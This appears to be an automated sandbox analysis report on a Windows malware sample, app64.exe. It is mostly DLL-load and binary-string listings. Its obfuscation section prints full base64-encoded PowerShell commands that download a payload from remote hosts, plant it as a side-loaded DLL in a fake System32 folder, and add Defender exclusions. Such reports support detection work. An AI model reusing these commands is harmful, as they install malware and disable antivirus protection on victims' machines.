Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\console_zero.exe Section loaded: libcurl.dll
Source: C:\Windows\System32\console_zero.exe Section loaded: zlib1.dll
Source: C:\Windows\System32\console_zero.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: app64.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: app64.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: svchost.exe, 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 00000022.00000002.2596284562.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623137940.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: vcruntime140d.amd64.pdb source: vcruntime140d.dll.13.dr
Source: Binary string: vcruntime140d.amd64.pdb,,, source: vcruntime140d.dll.13.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: svchost.exe, 0000001C.00000002.3270413285.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 00000022.00000002.2597062876.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002C.00000002.2623385168.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: svchost.exe, 0000001C.00000002.3269556745.00007FF8A7DCB000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: svchost.exe, 0000001C.00000002.3270312205.00007FF8B8B18000.00000002.00000001.01000000.0000000D.sdmp, libpq.dll.13.dr
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: svchost.exe, 0000001C.00000002.3270312205.00007FF8B8B18000.00000002.00000001.01000000.0000000D.sdmp, libpq.dll.13.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: svchost.exe, 0000001C.00000002.3270413285.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 00000022.00000002.2597062876.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002C.00000002.2623385168.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: svchost.exe, 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmp, libssl-3-x64.dll.13.dr
Source: Binary string: ucrtbased.pdb source: ucrtbased.dll.13.dr
Source: Binary string: PrintUI.pdb source: xcopy.exe, 00000008.00000002.2186107127.000001C43773B000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000A.00000002.2213277015.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000002.2687703393.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000000.2216782494.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe.8.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: svchost.exe, 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmp, libssl-3-x64.dll.13.dr
Source: Binary string: PrintUI.pdbGCTL source: xcopy.exe, 00000008.00000002.2186107127.000001C43773B000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000A.00000002.2213277015.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000002.2687703393.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000000.2216782494.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe.8.dr

Data Obfuscation
barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbG
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMz
Suspicious command line found
Source: unknown Process created: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"
Source: C:\Windows \System32\printui.exe Process created: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"
Source: C:\Users\user\Desktop\app64.exe Process created: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;" Jump to behavior
Source: C:\Windows \System32\printui.exe Process created: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;" Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;" Jump to behavior
